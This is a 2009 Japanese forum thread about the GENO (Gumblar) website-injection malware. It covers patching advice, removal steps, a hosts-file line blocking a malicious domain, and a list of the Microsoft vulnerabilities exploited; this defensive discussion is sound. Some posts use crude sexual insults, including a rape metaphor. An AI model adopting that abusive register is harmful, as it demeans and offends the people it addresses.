プラグイン突っ込んだり一部ファイルの処理横取りしたりでレイプし放題だったな 235 名前：192.168.0.774 mailto:sage [2009/05/27(水) 13:48:08 ID:H/k8FWrU0] Apple製品を使うってことはApple様に向かって股を開いて 「私はApple様の従順な奴隷ですから思う存分ファックしてください」と宣言するようなもの そんな連中はウイルスに感染しても別に普段と変わらないと思うよ ファックするのがApple様じゃなくて得体の知れないウイルスに代わるだけだしな 俺たちはそんな連中に近寄りたくないだけで 236 名前：192.168.0.774 mailto:sage [2009/05/27(水) 14:15:12 ID:p3rI2ovh0] 最新 Flash Player 10.0.22.87 Adobe Reader 9.1.1 まだ↑これが最新だよね？ 237 名前：192.168.0.774 mailto:sage [2009/05/27(水) 14:21:44 ID:pn6iaSeA0] ここはいつからアポースレになった？ 238 名前：192.168.0.774 mailto:sage [2009/05/27(水) 14:52:04 ID:n6+UUmaxP] QuickTimeなんてイラネだろ 239 名前：192.168.0.774 mailto:sage [2009/05/27(水) 14:56:15 ID:dxmZredg0] いらないんだけど変換君便利なんだよな･･･ 240 名前：192.168.0.774 mailto:sage [2009/05/27(水) 14:58:23 ID:DMxSQASUO] 林檎信者も林檎アンチもゴミ、つまり>>235もゴミ 241 名前：192.168.0.774 mailto:sage [2009/05/27(水) 15:06:57 ID:7U85I7ws0] 何を使おうが、 適切に選んでるか、使いこなしてるか、管理できてるか、 が問題であってだな・・・ 面倒な上、馬鹿馬鹿しいので止めた 242 名前：192.168.0.774 mailto:sage [2009/05/27(水) 15:17:28 ID:KFsQLuii0] スレ的には、Flash/Acrobatの穴がだいぶふさがったら、 いずれ順番で、QTの脆弱性も突かれるのかもな ただ、Flash/Acrobatと違って、業務機よりホーム機に入ってる方が多そうだから、 攻撃者にとって｢おいしい｣かどうかは、攻撃者のターゲット範囲によってくるか 243 名前：192.168.0.774 mailto:sage [2009/05/27(水) 15:17:32 ID:0KD43PY10] 変な奴に触ってしまったえんがちょえんがちょ 244 名前：192.168.0.774 mailto:sage [2009/05/27(水) 18:53:55 ID:LtJky3Fi0] QuickTimeは勝手に自分を標準プレイヤーにしたり ブラウザ上で開くだけでスタートアップに登録したりと困りもの で、QuickTimeの挙動がウザイ、でも変換君は使いたい って人はQuickTime Alternativeがおすすめ ただ変換君が使えるバージョンが入手かわからんが 245 名前：192.168.0.774 mailto:sage [2009/05/27(水) 19:11:14 ID:LoTgBZbR0] >>244 自分もそれ使ってる。 RealもQuickもこれで間に合うからな。 プレイヤーはいらないし。 246 名前：192.168.0.774 mailto:sage [2009/05/27(水) 19:53:39 ID:7RRpVkld0] GENOウィルス・質問掲示板 www1.atchs.jp/test/read.cgi/gegegeno/1/680-680 ここの680が書いてる555のタグ情報って既出？ 247 名前：192.168.0.774 mailto:sage [2009/05/27(水) 20:09:22 ID:cL+kp0Pk0] >>233 あるあるすぎて困る 248 名前：192.168.0.774 mailto:sage [2009/05/28(木) 00:46:33 ID:6Q6FXXKz0] しかしすっかり落ち着いた流れになったけど 皆どうしてるんだろう 249 名前：192.168.0.774 mailto:sage [2009/05/28(木) 00:49:47 ID:UQFqDqzO0] 応急対策はできても、恒久対策ができてないからね ウイルスが活発化しなければ、このままフィードアウト何じゃないかな・・・ 250 名前：192.168.0.774 mailto:sage [2009/05/28(木) 00:56:36 ID:XYDCILBX0] フィ…フィードアウト… 251 名前：192.168.0.774 mailto:sage [2009/05/28(木) 00:57:59 ID:0cYThVoc0] なにそれこわい 252 名前：192.168.0.774 mailto:sage [2009/05/28(木) 01:00:25 ID:UQFqDqzO0] 未だに対応(駆除、消去)のソフト聞かないし・・・ 遅いよね・・・ 253 名前：192.168.0.774 mailto:sage [2009/05/28(木) 01:06:17 ID:ysEgixzlP] システムに不可逆な改変を加えるマルウェアに感染したら安全が確認されている バックアップから書き戻すかOSの再インストールするしかない 254 名前：192.168.0.774 mailto:sage [2009/05/28(木) 01:30:38 ID:mVG3+O460] 自分の興味はウイルスから不正改竄に移った。 zone-hとかizumino.jpを見て、日々こんなにハッキングが行われているのかと。 GENOでなくても、これじゃいつどこに新種のウイルスが仕込まれてもおかしくない罠。 255 名前：192.168.0.774 mailto:sage [2009/05/28(木) 04:20:23 ID:lNaKdK5O0] 海外の方だと、インターネットの経路上にパケットキャプチャが仕掛けられていることすらあるしな。 そこを流れた平文パスワード(pop3とかftpとかtelnetとか)はダダ漏れ 辞書によるID/PASS総当りも常套手段だし、最近は日本人の名前やアニメ・ゲームのキャラクタまで入ってる。 安易なID/PASS設定しておくと、いつのまにかログインされて使われているオチ 「誰かが守ってくれる」なんて思っていたらインターネットでは生き残れない。 256 名前：192.168.0.774 [2009/05/28(木) 05:46:40 ID:eSuKYW+W0] 楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2 tsushima.2ch.net/test/read.cgi/news/1243425827/ 257 名前：192.168.0.774 mailto:sage [2009/05/28(木) 08:08:54 ID:7x2zaD760] >>256 GENOと関係なし。 258 名前：192.168.0.774 mailto:sage [2009/05/28(木) 09:55:39 ID:j5JE7+Uz0] >>255 2chだと自演するためだけに適当な串さしてる奴も危機感がないと思う 何されてるのか分からんのに 259 名前：192.168.0.774 mailto:sage [2009/05/28(木) 12:14:11 ID:Mzk/ssdW0] わけのわからない串は、わけのわからないモノを取りに行くのにけっこう助かったり マルウェア差し上げます。おひとりさま(1IP) 1日1回まで。みたいなとこ martuzもそんなんじゃなかったっけか ま、POSTにはつかわん 秘匿性は期待しとらん 260 名前：192.168.0.774 mailto:sage [2009/05/28(木) 16:31:51 ID:bhK+RmSY0] 新マルウエア「ＧＥＮＯウイルス」蔓延に注意 www.asahi.com/digital/digitre/TKY200905250299.html ASAHIでも記事になったようだ。GENOは無料で広告できていいねぇｗｗｗ 261 名前：192.168.0.774 mailto:sage [2009/05/28(木) 16:53:51 ID:OoqSOCZLP] fc2やっと注意喚起のメール来たよ 262 名前：192.168.0.774 mailto:sage [2009/05/28(木) 17:35:08 ID:Mzk/ssdW0] 月曜にきてたか [feed] blog.fc2.com/info/?xml 旧パスワード一斉無効措置付きか なるほどなー 263 名前：192.168.0.774 mailto:sage [2009/05/28(木) 17:39:28 ID:GHs75aeF0] >>261 うちには5/21に来てる 分散して送るから，長いときは１ヶ月くらいかけてるね 複数アカウント持ってるとわかるｗ 264 名前：192.168.0.774 mailto:sage [2009/05/28(木) 17:59:56 ID:Q+qjDG1G0] >>260 愛用していたアプリケーションが非対応だったから倦厭していたが、 Vistaってそんな機能があったんだな。 265 名前：192.168.0.774 mailto:sage [2009/05/28(木) 18:28:38 ID:pUjLwD3e0] UACがなんなのかわからないやつがいてびっくり 今回はGENOどうこうより 初心者レベルの内容も熟知してないことが脅威だったわ 266 名前：192.168.0.774 mailto:sage [2009/05/28(木) 18:56:31 ID:gkgYHsms0] 誰も彼もがビスタ使ってるわけじゃないんだから 267 名前：192.168.0.774 mailto:sage [2009/05/28(木) 20:32:46 ID:g4U0zyYz0] 確かに>>264を見る限り>>264はVista使ってないよな UACがなんなのかわからなくても全く問題ないｗ 268 名前：192.168.0.774 mailto:sage [2009/05/28(木) 20:35:08 ID:wffocc+90] いや嫌々ながら使ってると取れる 269 名前：192.168.0.774 mailto:sage [2009/05/28(木) 21:06:24 ID:TxXedgLr0] 倦厭じゃなくて敬遠じゃないの？っていう突っ込みはナシ？ｗ 270 名前：192.168.0.774 mailto:sage [2009/05/28(木) 21:17:34 ID:wD+USA9K0] >>260 この記事の中に ＞一部に「ＧＥＮＯウイルスには、セキュリティー対策ソフトが役に立たない」といううわさも ＞流れていますが、それは間違いです。 って書いてあるんだけど… 271 名前：192.168.0.774 mailto:sage [2009/05/28(木) 21:20:43 ID:7jbhXxMV0] 亜種には対応していない とも書いてあるけどな。一番はやったときに検体が提出されたものにはさすがに対応してるんじゃね？ 試す気はないが。 272 名前：192.168.0.774 [2009/05/28(木) 22:08:31 ID:qnsFnw2TO] cmdでのサイズチェックは問題なし、regeditも動作確認した でもインターネットがくそ重い、ブラウザ変えても改善しない、DL速度が10KB/secも出なくなった これは感染したと見ていいのかな… 273 名前：192.168.0.774 mailto:sage [2009/05/28(木) 22:15:46 ID:wffocc+90] >>272 何でそうなるんだ 合理的な思考しろよ 274 名前：192.168.0.774 mailto:sage [2009/05/28(木) 22:24:27 ID:Oax7cXyu0] 使ってるセキュリティソフトが2chのどこに行ってもJS Downloador検出してまじでびびった アップデートしたら直ったけどまじで心臓に悪い 275 名前：192.168.0.774 mailto:sage [2009/05/29(金) 01:10:03 ID:piBcLweA0] 自分は今日、ネットは普通に使ってるのに Flashが何かわかってない人に出会った Flashってなに？ってきかれて、まずどう返していいのか一瞬困ったｗ 知らなくても問題なく使えてしまうからだろうけど 276 名前：192.168.0.774 mailto:sage [2009/05/29(金) 01:57:00 ID:vEUQiBSK0] Flashぐらいでびびるなよ ファイアウォール知らないやつとかざらにいるぞ 277 名前：192.168.0.774 mailto:sage [2009/05/29(金) 02:37:36 ID:OlQbOmgA0] Flash知らないくらいなら普通にいるよ そんくらいなら動画サイト見てるなら入ってるよで通じるし いちいち言うほどのことじゃない つーかそれをバカにしちゃうほうがアレだわ 278 名前：192.168.0.774 mailto:sage [2009/05/29(金) 03:11:05 ID:ehBR5T6V0] 今は、ADSL 12MB が、約2千円、プロバイダのメール無しで約1.5千円なのに、 Yahoo! BB が値下げしない悪徳業者だと気づかないで契約時のまま 4千円近く 払わされている無自覚の感染者が何百万人もいるほうが驚くな 年間2万4千円多く徴収されているのに気づかない人たちを救ってやってったら、 景気回復するんじゃないのｗ 468 名前： 非通知さん 投稿日： 2009/05/17(日) 14:20:19 ID:3bcz0igI0 【ソフトバンク】 ソフトバンクＢＢ�鰍ﾌ総合ブロードバンドサービス｢Yahoo! BB ADSL｣における、当期末の累積接続回 線数は429 万9,000 回線、当第４四半期のユーザー支払いベースのARPU は4,262 円となりました。 279 名前：192.168.0.774 mailto:sage [2009/05/29(金) 08:45:40 ID:JsHSZpr50] パソコンには詳しくないからよくわからないけど怖いですね〜 …って書いてるサイト運営者が一番嫌だ。 280 名前：192.168.0.774 mailto:sage [2009/05/29(金) 08:47:11 ID:x3Y9c4A10] これのメール版があるんだね (((((((( ；ﾟДﾟ)))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ 281 名前：192.168.0.774 mailto:sage [2009/05/29(金) 10:04:49 ID:4z/zw8YJ0] プリインストールで入れてるなら、更新についても責任持ってもらいたいもんだな 282 名前：192.168.0.774 mailto:sage [2009/05/29(金) 10:55:56 ID:uOCaNFIZ0] changi.2ch.net/test/read.cgi/doujin/1242809411/806- 同人板のほうにアレな情報が 283 名前：192.168.0.774 mailto:sage [2009/05/29(金) 11:26:57 ID:BthGL6et0] ＞上司から、お前の存在自体がセキュリティホールだ！と言われようとも ぐのーむさんこんなこと言われてるのか・・・ あの活動が何のために行われてるのか上司は考えたことがあるのか 284 名前：192.168.0.774 mailto:sage [2009/05/29(金) 11:31:03 ID:lYJ/D9vX0] >>282 別に不思議でもないんでもないっしょ。 285 名前：192.168.0.774 mailto:sage [2009/05/29(金) 17:06:05 ID:foH44K5U0] 体験者に一度きいてみたいんだが、感染サイトを踏んだらまず何がおきるんだ adobe関係のウィンドウが開いたりするわけ？ 286 名前：192.168.0.774 mailto:sage [2009/05/29(金) 18:01:38 ID:3HxQrXqXP] 割れ目がじゅわっ〜となる 287 名前：192.168.0.774 mailto:sage [2009/05/29(金) 19:08:55 ID:VI53AlJ90] >>258の言うように、わけの分からない串を使うのは危険なのだろうが、 巻き添え規制をくらっているため、仕方なく串を使った。 ＩＤの出ないセキュ板のスレへの書き込みなので、自演のためではないが。 288 名前：192.168.0.774 mailto:sage [2009/05/29(金) 19:30:11 ID:unRBn1g50] 2chにかける串ってどこで探してる? 289 名前：192.168.0.774 mailto:sage [2009/05/29(金) 19:47:31 ID:btAPZUmJ0] >>285 様々だからわからん(環境次第) 290 名前：192.168.0.774 mailto:sage [2009/05/29(金) 20:19:51 ID:/RoVQptw0] はじめはリストで弾くようにしていたけれども、リストを更新するのが面倒になったので、 unscapeなんて文字コードをテーマにしたサイト以外は碌な目的で使わないよねと思って、 evalとunscapeを含むコードがあったら、とりあえずコメントアウトして、アラートを出すProxomitronのフィルタを書いたのだけれども、需要あるかな。 へっぽこだから、ブログでこっそり公開しようかとも思ったのだけれども、需要があるようなら投下します。 291 名前：192.168.0.774 mailto:sage [2009/05/29(金) 20:24:16 ID:KFlNWkjO0] ヒント：Google Analytics 292 名前：192.168.0.774 mailto:sage [2009/05/29(金) 20:46:38 ID:OlQbOmgA0] >>287 つ　● つ　p2 293 名前：192.168.0.774 mailto:sage [2009/05/29(金) 23:13:11 ID:zmeqzjSv0] 大丈夫かよ横浜市役所・・・ www.google.com/safebrowsing/diagnostic?hl=ja&site=city.yokohama.jp 294 名前：192.168.0.774 mailto:sage [2009/05/29(金) 23:28:16 ID:Si5aZKJwP] おいおい 【XP厨死亡】DirectXに脆弱性 tsushima.2ch.net/test/read.cgi/news/1243591930/ 295 名前：192.168.0.774 mailto:sage [2009/05/30(土) 00:31:39 ID:e8IE9Rq3P] すっかり過疎ったな 296 名前：192.168.0.774 mailto:sage [2009/05/30(土) 00:50:24 ID:2UGL94hdO] GENOに感染したまま、気付かずに1ヶ月ほどPC利用していました。 HP等は開設しついません。 個人情報が漏れるそうですが、ネットショッピングの際のログインパスワード等は大丈夫なのでしょうか？ 297 名前：192.168.0.774 mailto:sage [2009/05/30(土) 01:08:14 ID:NJoQk9Ql0] 抜かれる可能性があると言われてたけどまだ報告はなかったような 心配だったら履歴を確認してパス変更でいんじゃね？インスコ済の話ね 298 名前：192.168.0.774 mailto:sage [2009/05/30(土) 01:30:00 ID:ja4TbjLv0] 前に、クローズアップ現代でボットの話題をやった回の動画ないですか？ 299 名前：192.168.0.774 mailto:sage [2009/05/30(土) 01:32:59 ID:i+8LuJWk0] >>298 うっせえハゲ。 300 名前：192.168.0.774 mailto:sage [2009/05/30(土) 01:34:43 ID:2UGL94hdO] >>297 レスありがとうございます。 契約者名で大量のスパムが来ていたから変だとは思っていたんです。 現在は隔離済みです。 パスは一応変更しておきます。 1日10分ほどしか立ち上げないPCだったため、スケジュールスキャンをオフにしていましたorz 301 名前：192.168.0.774 mailto:sage [2009/05/30(土) 01:45:18 ID:Xadobnvw0] なるべくならOSいれなおしたほうがいいけどお好みで そのあとにオンラインサービス各種のパスワード変更 フリーメールのパスワードも変えてね 302 名前：192.168.0.774 mailto:sage [2009/05/30(土) 02:09:41 ID:ja4TbjLv0] >>298 自己レス。見つかった。 GENOがボット目的かどうかはわからんが、 嫌儲はアフィチェッカーよりボットを憎むべきじゃないだろか？ 303 名前：192.168.0.774 mailto:sage [2009/05/30(土) 06:37:58 ID:gEls4z/j0] だいたいアフィチェッカーよりもatwikiがどんだけ儲けてると思ってるんだよ糞 yahooとか使うなよハゲ 論理的思考ができない嫌儲はBOTに感染して苦しむべき 304 名前：192.168.0.774 mailto:sage [2009/05/30(土) 09:10:48 ID:tVJG0Fy00] なんかもうGENO関係なくね 305 名前：192.168.0.774 mailto:sage [2009/05/30(土) 09:14:25 ID:K6dO28la0] 沈静化したということで喜ぼう。 306 名前：192.168.0.774 mailto:sage [2009/05/30(土) 09:28:15 ID:P85iemiB0] QT周りの脆弱性狙いでまもなく再開するよ。 307 名前：192.168.0.774 mailto:sage [2009/05/30(土) 09:42:07 ID:cGiKVc7U0] パソコンの中のQTを検索してみたら、adobeの中にあったんだけど、大丈夫なんでしょうか？ もちろん最新バージョンにしています。 308 名前：192.168.0.774 mailto:sage [2009/05/30(土) 10:03:58 ID:qdysrUs00] QTってゼロデイ状態じゃなかったっけ？ なんか、DirectXまで出てきたし、やり方確立したら騒ぎになるかもね 309 名前：192.168.0.774 mailto:sage [2009/05/30(土) 10:22:10 ID:P85iemiB0] >>307 Acrobat 3D用のプラグインでしょ。 存在すること自体は問題ない。 >>308 そう。Apple製品で脆弱性が見つかると、ほとんどいつもゼロデイ状態になる。 310 名前：192.168.0.774 mailto:sage [2009/05/30(土) 13:34:46 ID:xI0fhZRq0] メモ ttp://www3.atword.jp/gnome/2009/05/30/microsoft-slashed-quicktime-due-to-directshow-vulnerability/ 311 名前：192.168.0.774 mailto:sage [2009/05/30(土) 14:40:48 ID:u7Zs/D5w0] purser: 旅客係(一般人の意味のパーサー。<=>IT用語のパーサ) ぐのむたんしっかり汁ｗ なんにせ、マルチメディア系のもんは何だって信用ならん …みんなまるごと砂箱逝き。 312 名前：192.168.0.774 mailto:sage [2009/05/30(土) 15:26:29 ID:vgPL/By80] ttp://headlines.yahoo.co.jp/hl?a=20090530-00000433-yom-soci ＞同省岐阜国道事務所の道路状況を伝えるサイトも改ざんされ、 ＞閲覧者のパソコンがコンピューターウイルスに感染する状態になっていた。 ＞改ざんは同７日から行われていたとみられ、 ＞２度にわたって利用者から「ウイルスが検知された」と指摘されていたが、 ＞同事務所では２４日までシステムを停止しなかった。 ＞その間のサイト閲覧件数は７０００件以上に上っている。 これもしかしてGENOか？ 313 名前：192.168.0.774 mailto:sage [2009/05/30(土) 15:30:56 ID:K6dO28la0] 国交省のかな？そんな報告あったはず。 314 名前：192.168.0.774 mailto:sage [2009/05/30(土) 16:26:14 ID:+gwIZfhs0] >>312 ＞２度にわたって利用者から「ウイルスが検知された」と指摘されていたが、 ＞同事務所では２４日までシステムを停止しなかった。 ＞その間のサイト閲覧件数は７０００件以上に上っている。 ひどい話だな。ＧＥＮＯだろ 315 名前：192.168.0.774 mailto:sage [2009/05/30(土) 16:53:10 ID:ClpJp3oP0] だいたい半数がXP/2000ユーザーだとすると、それでも3500件か…。 316 名前：192.168.0.774 mailto:sage [2009/05/30(土) 19:01:05 ID:ZoOVnb3tO] 色々デカイサイトが感染してると 俺のサイトで感染したのが誤魔化せるからありがてー 317 名前：192.168.0.774 mailto:sage [2009/05/30(土) 19:39:19 ID:3MWi+wus0] 新しいPCかOS買えウィルス？ 318 名前：192.168.0.774 mailto:sage [2009/05/30(土) 20:39:53 ID:u7Zs/D5w0] 買ったら負けかなと思ってる奴は、意地で買わんから、ま、そんなにそうはならんだろ 319 名前：192.168.0.774 mailto:sage [2009/05/30(土) 22:28:33 ID:J5jeyF8C0] QuickTimeってadobe製品なんですか？ 320 名前：192.168.0.774 mailto:sage [2009/05/30(土) 22:42:02 ID:rUA0di420] GoogleはAdobe製品じゃないですよ 321 名前：192.168.0.774 mailto:sage [2009/05/31(日) 02:43:28 ID:+yn1Qi0T0] GENOウイルスチェッカーのサイトいったら フラッシュでIE用の更新が来てたが adobeのサイトからはどうやっていくんだ？ チェッカーのURLはexe直なので、なんかいや。 322 名前：192.168.0.774 mailto:sage [2009/05/31(日) 02:54:04 ID:Ncu0YETE0] >>321 調子こいてんじゃねえよ、クズが 323 名前：192.168.0.774 mailto:sage [2009/05/31(日) 03:05:14 ID:nxL2UMVc0] ブログのコメント欄や、wikiに大量に投下されるスパムは GENOと関係ありますか？ 324 名前：192.168.0.774 mailto:sage [2009/05/31(日) 03:21:53 ID:L/RlP11XP] いいえ 325 名前：192.168.0.774 mailto:sage [2009/05/31(日) 12:36:21 ID:f92421kK0] >>321 Flash Playerの更新なんて来ていないよ。 あれはページ内の記述に訂正更新があっただけ。 紛らわしい書き方なんで、あなたと同じく勘違いした奴が多数。 326 名前：192.168.0.774 [2009/05/31(日) 14:56:31 ID:qnzGlpd70] ＰＣに詳しいこちらの住人の皆様に聞きたいのですが… ＧＥＮＯも大分落ち着いた…ということを聞き、久しぶりに趣味の サイト巡りをしていたところ、私のＰＣのセキュリティが何らかの ウィルスに反応し、削除（？）を行いました。 念のため、【まとめ】にあるやり方を見ながら再度ウィルスチェック をしたところ、幸いなことに私のパソコン（Vista）は感染を免れて いました。 こういった場合、サイトはウィルスに侵されていると考えてもよいので しょうか？表ページには週２回の自動ウィルスチェックが入っていると なっていましたが…。 もしウィルスに侵されているのならば、ほかの人がウィルスに侵される 危険があります。なので、管理人さんにウィルスに侵されているのでは？ とメールを送りたいのですが、今度閲覧してウィルスに侵されたら…と 思うと、恐ろしくてもう一度そのサイトを開く気になれないのです。 こういった場合、何らかの伝達手段はありますでしょうか？ 327 名前：192.168.0.774 mailto:sage [2009/05/31(日) 15:02:15 ID:YRT85t+60] >>326 携帯で開いて知らせれば？PCビューアーとか今はついてるでしょ 328 名前：192.168.0.774 mailto:sage [2009/05/31(日) 15:10:08 ID:Ncu0YETE0] >>326 パソコン持って逃げろ 329 名前：192.168.0.774 [2009/05/31(日) 15:10:43 ID:qnzGlpd70] >>327 ありがとうございます。 携帯は国外在住のため、所持していないのです。 もう、他の方がお知らせしてくださるのを待つしか手はないですよね。 330 名前：192.168.0.774 mailto:sage [2009/05/31(日) 15:43:20 ID:yExQo+6e0] >>329 URLをここに晒せばいいじゃん。 331 名前：192.168.0.774 [2009/05/31(日) 16:41:46 ID:9R9WK3IZ0] 感染しました。 geno.2ch.tc/ の「GENOウイルス感染からの復帰方法」を途中までやってわからなくなってしまいました。 * C:\WINDOWS\Prefetch 内を全部削除 * [Windowsキー] + [R] を押してファイル名を指定して実行で msconfig * スタートアップに何も書かれていない行があったのでチェックをOFF * regeditを起動して(起動できない場合は command を実行してその中から regedit を実行) * \\HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの一番上が (規定) REG_SZ (値の設定無し) になっていることを確認 再起動 * C:\WINDOWS\System32\sqlsodbc.chm を削除　→　復活しないことを確認 * 正常なsqlsodbc.chmに差し替え コマンドプロンプトでreceditを起動し 「〜の一番上が (規定) REG_SZ (値の設定無し) になっていることを確認」 する方法を教えていただけないでしょうか。 332 名前：192.168.0.774 mailto:sage [2009/05/31(日) 16:47:45 ID:+8joFj3w0] >>331 リカバリしろカス 333 名前：192.168.0.774 mailto:sage [2009/05/31(日) 16:55:57 ID:pWZzGSp1P] c:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 334 名前：192.168.0.774 mailto:sage [2009/05/31(日) 18:51:04 ID:c3DaDWZu0] あのサイト見るな 不十分サイト １修正案 ■ adobe readerを最新版にアップデートする ttp://get.adobe.com/jp/reader/ 　とりあえず最新版にしましょう。 　インストール後本体をアップデートしておく事 　adobe readerを開いて　ヘルプ→アップデートの有無をチェック ■ adobe flashplayerを最新版に更新 ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨 ■ acrobat javascriptをオフに 　 adobe readerを開いて　メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す ■ブラウザでスクリプト使用を基本無効に設定 　 FirefoxにてNoscriptを利用 　 (Operaでflashオフでもおｋ([F12]を押す→[プラグインを有効にする]のチェックを外す) 　 (sleipnir、IEでも上手に設定するとなんとかなります) 優先度低 ■ Vistaの人ははUACをONにする ■ hostsファイル書き換え 　 hostsファイルに以下の行を追加 　 127.0.0.1 martuz.cn 　 hostsファイルの在処 　 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 　 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 　 Windows 95/98/MEの場合→「C:\Windows」 335 名前：192.168.0.774 mailto:sage [2009/05/31(日) 20:05:10 ID:Cyam+zfo0] Firefoxも基本機能の設定でスクリプトを無効にできる。 Noscriptほか拡張は、それ以上を求める人向け。 336 名前：192.168.0.774 mailto:sage [2009/05/31(日) 20:18:52 ID:nC9VmBzmO] 前まではNosc使って許可するしないで迷ってたけど 根本から切っちゃったらラクになれたわ 337 名前：192.168.0.774 mailto:sage [2009/05/31(日) 20:28:11 ID:ptHEwX4Z0] >>334 粘着死ねうざい 338 名前：192.168.0.774 mailto:sage [2009/05/31(日) 20:34:33 ID:ez9DL56A0] ＳＩＮＥとかいうんだ 勝手にテンプレ変えてヒッシだな 339 名前：192.168.0.774 [2009/05/31(日) 22:03:41 ID:VISqyoYW0] >>334 不十分でもあなたよりはそのサイト役に立ってますよ、きっと セキュ板の話題をここにもちこまないでください 340 名前：192.168.0.774 mailto:sage [2009/05/31(日) 22:10:59 ID:wzRIkfFE0] 役にたたねえよ 341 名前：192.168.0.774 mailto:sage [2009/05/31(日) 22:20:47 ID:wzRIkfFE0] まーテンプレは直さな セキュ板の話題だ言っても 引用先はそれでかしらんが修正したんだからな 脈絡無くリンク入ってるし 342 名前：192.168.0.774 mailto:sage [2009/06/01(月) 01:23:58 ID:R+p/tPKN0] >>339 管理人乙です。 343 名前：192.168.0.774 mailto:sage [2009/06/01(月) 16:50:37 ID:gRaxrwT0P] 新たな「Webウイルス」出現、2万件以上の正規サイトに埋め込まれる 「Glumbler」ウイルスとは別物、対策ソフトを使っていても被害の恐れ itpro.nikkeibp.co.jp/article/NEWS/20090601/331097/ 344 名前：192.168.0.774 mailto:sage [2009/06/01(月) 17:20:49 ID:RXEaw0Ub0] >>343 やっぱり似たようなのが出てきちゃったな。 このタイミングで出てきたってことはQTの脆弱性も使われてそうだ。 345 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:22:36 ID:o7C9L8Ls0] >>343 対応してる4社ってどこ？ き弱性なんてかなり前からわかってたのに何やってんの？ 346 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:26:43 ID:r9BK4C1O0] き弱性･･･？ 347 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:37:50 ID:vHlvNban0] もろよわせいだろｊｋ 348 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:44:12 ID:sEf/HHkG0] マジか？ こんどは何の脆弱性使用してるんだ？ 収束したと思って、普通にサイト見始めちゃってたよ。 349 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:47:57 ID:W/jhCmDA0] つかってる脆弱性そのものは同じじゃないのかな 350 名前：192.168.0.774 mailto:sage [2009/06/01(月) 18:53:12 ID:sEf/HHkG0] リンク先見ると、virustotal へのリンクあるね。 対応してる４社の名前も確認できるかも。 しかし、トレンドマイクロが対応してるとは… DrWebも対応してるみたいだし、CureItで検索かけてみるかな… 351 名前：192.168.0.774 mailto:sage [2009/06/01(月) 19:04:20 ID:B9YOsgHE0 BE:1789209869-2BP(0)] 偽GAってのは、 googleanalytlcs.net らしい 一応すでにぐぐるSB入りしてるけど、ぐぐるSB非対応のブラウザは注意が必要 352 名前：192.168.0.774 mailto:sage [2009/06/01(月) 19:20:34 ID:G/58Ch8R0] 何だよ再燃かよ。これからどんどん出てくるかね 353 名前：192.168.0.774 mailto:sage [2009/06/01(月) 19:31:48 ID:EN9NgtDC0] 結局クーグルちょろめ最強か 354 名前：192.168.0.774 mailto:sage [2009/06/01(月) 20:57:57 ID:qG9351lq0] ぐぐるSBってなに？ 355 名前：192.168.0.774 mailto:sage [2009/06/01(月) 21:18:46 ID:B9YOsgHE0 BE:2087410897-2BP(0)] おっとあっちに書いてしまった どっちでもかまわんが、どっちかに固めるつもりだった pc11.2ch.net/test/read.cgi/sec/1243346768/575 356 名前：192.168.0.774 mailto:sage [2009/06/01(月) 21:55:31 ID:B9YOsgHE0 BE:894604493-2BP(0)] MS06-014 KB911562 (MDAC) MS06-057 KB923191 (WebViewFolderIcon) MS06-067 KB922760 (WinZip, killbit) MS09-002 KB961260 (IE7) QuickTime: わからんが、2007年には出現していた手口の様子 …MS09-002 以外、なんか古いやつばっかり…本命じゃないの掴まされたかな てきとーにスクリプト読み直してみるか 357 名前：192.168.0.774 mailto:sage [2009/06/01(月) 23:21:23 ID:gRaxrwT0P] MS06-014は常連だなあ 358 名前：192.168.0.774 mailto:sage [2009/06/03(水) 15:08:36 ID:3dZzweiq0] Acrobat,Flash,QTとかの類は全部アンインストールして Javascript切るしかないな 359 名前：192.168.0.774 mailto:sage [2009/06/03(水) 15:13:30 ID:2xEHinnPP] 終息したみたいだね 360 名前：192.168.0.774 mailto:sage [2009/06/03(水) 15:24:36 ID:5t7XiWC30] 出遅れたけど聞いておこう。 ffdshowみたいなコーデック集にも、同じ脆弱性あるのかな？ 361 名前：192.168.0.774 mailto:sage [2009/06/03(水) 15:36:24 ID:U4wE4RiO0] なんという無意味な問いだ 広い意味では同じ脆弱性があるとも言えるが 狭い意味では同じ脆弱性があるわけないだろ 362 名前：192.168.0.774 mailto:sage [2009/06/03(水) 23:44:13 ID:/fJlB1oR0] 偽サイトにユーザーをリダイレクトするコードが蔓延--ウェブセンスが警告 japan.cnet.com/news/media/story/0,2000056023,20394265,00.htm 363 名前：192.168.0.774 mailto:sage [2009/06/04(木) 20:51:18 ID:ovRMQuOx0] >>209 とりあえずは塞がれたらしい。 iPhone OS 3.0対応の「iTunes 8.2」公開、「QuickTime 7.6.2」も internet.watch.impress.co.jp/cda/news/2009/06/02/23636.html 364 名前：192.168.0.774 mailto:sage [2009/06/04(木) 21:14:00 ID:ek6ha3Fn0] でもDirectShowの脆弱性が解決してないので QuickTime関連がヤバイ現状には変化なしｗ 365 名前：192.168.0.774 mailto:sage [2009/06/04(木) 22:17:47 ID:9yOhj3HV0] それはQTではなくDXの問題 それにウェブブラウジング中にDX動かすなんてのもないと思う 366 名前：192.168.0.774 mailto:sage [2009/06/04(木) 22:48:03 ID:ASeSs5VK0] QuickTime側入れ替えても解決しない問題箇所だからね。 367 名前：192.168.0.774 mailto:sage [2009/06/04(木) 23:39:31 ID:fBOkvqee0] まぁ、QTが対策されたことによって、webから直接DirectShowの穴叩くのは難しくなったか 368 名前：192.168.0.774 mailto:sage [2009/06/04(木) 23:57:02 ID:yg7JUHlK0] >>364-366で指摘してるDirectShowの問題って internet.watch.impress.co.jp/cda/news/2009/05/29/23606.html の事だよな？ DirectShowのファイルオープンってフィルタ・スプリッタ経由でやってるはずで、 QT用フィルタ・スプリッタが無ければQT開くもヘッタクレも無いはずだから、 これはQT用フィルタ・スプリッタのバグで起きてる問題だと見るべきだよな。 